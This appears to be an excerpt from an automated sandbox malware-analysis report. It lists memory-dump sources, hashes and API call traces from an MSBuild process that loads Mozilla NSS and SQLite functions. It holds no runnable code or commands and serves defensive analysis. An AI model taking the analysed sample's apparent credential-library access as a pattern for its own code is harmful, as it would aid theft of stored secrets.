                                                                                        • Instruction Fuzzy Hash: 31E01D35150108AFCB019F75ED0CC5A37A5AF08368B50C910F519C7771E631D4658750
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
                                                                                        • Instruction ID: 1155e50313a81232bf778eac16d6a35ef06a201ea62f1e66167e4371e39770e4
                                                                                        • Opcode Fuzzy Hash: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
                                                                                        • Instruction Fuzzy Hash: 5F11CE797043458FDB04DF28C8C46AA77A2FF86368F14807DD8198B701DB31E816CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
                                                                                        • Instruction ID: 72375ea426853667cd315314d63c07f176fd7bece913ffb5c97e85a15aad83ea
                                                                                        • Opcode Fuzzy Hash: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
                                                                                        • Instruction Fuzzy Hash: 9011F776A002199F8B00CF99D8809EFBBF9EF8C664B554429ED19E7300D230ED10CBE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Alloc_ArenaArena_DoesFindMechanismTag_
                                                                                        • String ID:
                                                                                        • API String ID: 2003479236-0
                                                                                        APIs
                                                                                          • Part of subcall function 6C60CA30: EnterCriticalSection.KERNEL32(?,?,?,6C66F9C9,?,6C66F4DA,6C66F9C9,?,?,6C63369A), ref: 6C60CA7A
                                                                                          • Part of subcall function 6C60CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C60CB26
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,6C61BE66), ref: 6C756E81
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C61BE66), ref: 6C756E98
                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C7BAAF9,?,?,?,?,?,?,6C61BE66), ref: 6C756EC9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C61BE66), ref: 6C756ED2
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C61BE66), ref: 6C756EF8
                                                                                        • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F1F
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F28
                                                                                        • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F3D
                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C61BE66), ref: 6C756FA6
                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C7BAAF9,00000000,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FDB
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FE4
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FEF
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C61BE66), ref: 6C757014
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,6C61BE66), ref: 6C75701D
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C61BE66), ref: 6C757030
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C61BE66), ref: 6C75705B
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C61BE66), ref: 6C757079
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C61BE66), ref: 6C757097
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C7570A0
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                        • String ID: Pyl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                        • API String ID: 593473924-652789291
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_WrapKey), ref: 6C6B8E76
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B8EA4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8EB3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8EC9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B8EE5
                                                                                        • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C6B8F17
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8F29
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8F3F
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6B8F71
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8F80
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8F96
                                                                                        • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C6B8FB2
                                                                                        • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C6B8FCD
                                                                                        • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C6B9047
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nyl
                                                                                        • API String ID: 1003633598-754918038
                                                                                        APIs
                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C50
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C5B
                                                                                        • PR_smprintf.NSS3(6C7BAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C76
                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4CAE
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CC9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CF4
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4D0B
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D5E
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D68
                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6E4D85
                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6E4DA2
                                                                                        • free.MOZGLUE(?), ref: 6C6E4DB9
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E4DCF
                                                                                        Similarity
                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                        • API String ID: 3756394533-2552752316
                                                                                        APIs
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C6C6943
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C6C6957
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C6C6972
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C6C6983
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6C69AA
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6C69BE
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6C69D2
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6C69DF
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C6C6A5B
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6D8C
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6DC5
                                                                                        • free.MOZGLUE(?), ref: 6C6C6DD6
                                                                                        • free.MOZGLUE(?), ref: 6C6C6DE7
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6E1F
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E4B
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E72
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EA7
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EC4
                                                                                        • free.MOZGLUE(?), ref: 6C6C6ED5
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6EE3
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EF4
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F08
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6F35
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F44
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F5B
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6F65
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
                                                                                          • Part of subcall function 6C6C6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96
                                                                                          • Part of subcall function 6C6C6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6F90
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6FC5
                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C6C6FF4
                                                                                        Similarity
                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                        • String ID: +`ml
                                                                                        • API String ID: 1304971872-2331444378
                                                                                        APIs
                                                                                        • PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C6C5989), ref: 6C6E0571
                                                                                          • Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
                                                                                          • Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
                                                                                          • Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
                                                                                          • Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0
                                                                                        • PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C6C5989), ref: 6C6E05B7
                                                                                        • PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05C8
                                                                                        • strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05EC
                                                                                        • strstr.VCRUNTIME140(00000001,?), ref: 6C6E0653
                                                                                        • free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0681
                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06AB
                                                                                        • PL_NewHashTable.NSS3(00000000,6C6DFE80,?,6C72C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06D5
                                                                                        • PL_NewHashTable.NSS3(00000000,?,6C72C350,6C72C350,00000000,00000000), ref: 6C6E06EC
                                                                                        • PL_HashTableAdd.NSS3(?,6C7AE618,6C7AE618), ref: 6C6E070F
                                                                                          • Part of subcall function 6C602DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C602E35
                                                                                        • PL_HashTableAdd.NSS3(FFFFFFFF,6C7AE618), ref: 6C6E0738
                                                                                        • PL_HashTableAdd.NSS3(6C7AE634,6C7AE634), ref: 6C6E0752
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0767
                                                                                        Similarity
                                                                                        • API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
                                                                                        • String ID: 4zl$NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags$$~l
                                                                                        • API String ID: 514890423-3720180156
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,6C6C8C5B,-00000001), ref: 6C6BE655
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • PK11_GetIVLength.NSS3(-00000001,?,?,6C6C8C5B,-00000001), ref: 6C6BE7DE
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE7F4
                                                                                        • PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE807
                                                                                        • PK11_GetIVLength.NSS3(-00000001,?,?,6C6C8C5B,-00000001), ref: 6C6BE81B
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE82E
                                                                                        • PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE841
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE852
                                                                                        • PORT_Alloc_Util.NSS3(00000004,?,?,6C6C8C5B,-00000001), ref: 6C6BE878
                                                                                        • free.MOZGLUE(00000000,?,?,6C6C8C5B,-00000001), ref: 6C6BE8AB
                                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE8B6
                                                                                        • PORT_Alloc_Util.NSS3(00000008,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE8D4
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6BE9D5
                                                                                        Similarity
                                                                                        • API ID: Util$Alloc_$K11_$GenerateLengthRandomfree$Item_ValueZfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1964932494-0
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C6C2DEC
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C6C2E00
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E2B
                                                                                        • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E43
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000,?), ref: 6C6C2E74
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000), ref: 6C6C2E88
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EC6
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EE4
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EF8
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2F62
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C2F86
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2F9E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2FCA
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C301A
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C302E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C3066
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C3085
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C30EC
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C310C
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C3124
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C314C
                                                                                          • Part of subcall function 6C6A9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A918D
                                                                                          • Part of subcall function 6C6A9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A91A0
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C316D
                                                                                        Similarity
                                                                                        • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                        • String ID:
                                                                                        • API String ID: 3383223490-0
                                                                                        APIs
                                                                                        • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C264E
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C274D
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C28A9
                                                                                          • Part of subcall function 6C6D3440: PK11_GetAllTokens.NSS3 ref: 6C6D3481
                                                                                          • Part of subcall function 6C6D3440: PR_SetError.NSS3(00000000,00000000), ref: 6C6D34A3
                                                                                          • Part of subcall function 6C6D3440: TlsGetValue.KERNEL32 ref: 6C6D352E
                                                                                          • Part of subcall function 6C6D3440: EnterCriticalSection.KERNEL32(?), ref: 6C6D3542
                                                                                          • Part of subcall function 6C6D3440: PR_Unlock.NSS3(?), ref: 6C6D355B
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C27A1
                                                                                        • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?,?), ref: 6C6C27B5
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C27CE
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C27E8
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2800
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C6CF854
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C6CF868
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C6CF882
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(04C483FF,?,?), ref: 6C6CF889
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C6CF8A4
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C6CF8AB
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C6CF8C9
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(280F10EC,?,?), ref: 6C6CF8D0
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2834
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C284E
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2866
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
                                                                                        • String ID: .fil$.fil
                                                                                        • API String ID: 544520609-325794162
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_Digest), ref: 6C6B6D86
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6DB4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6DC3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6DD9
                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C6B6DFA
                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C6B6E13
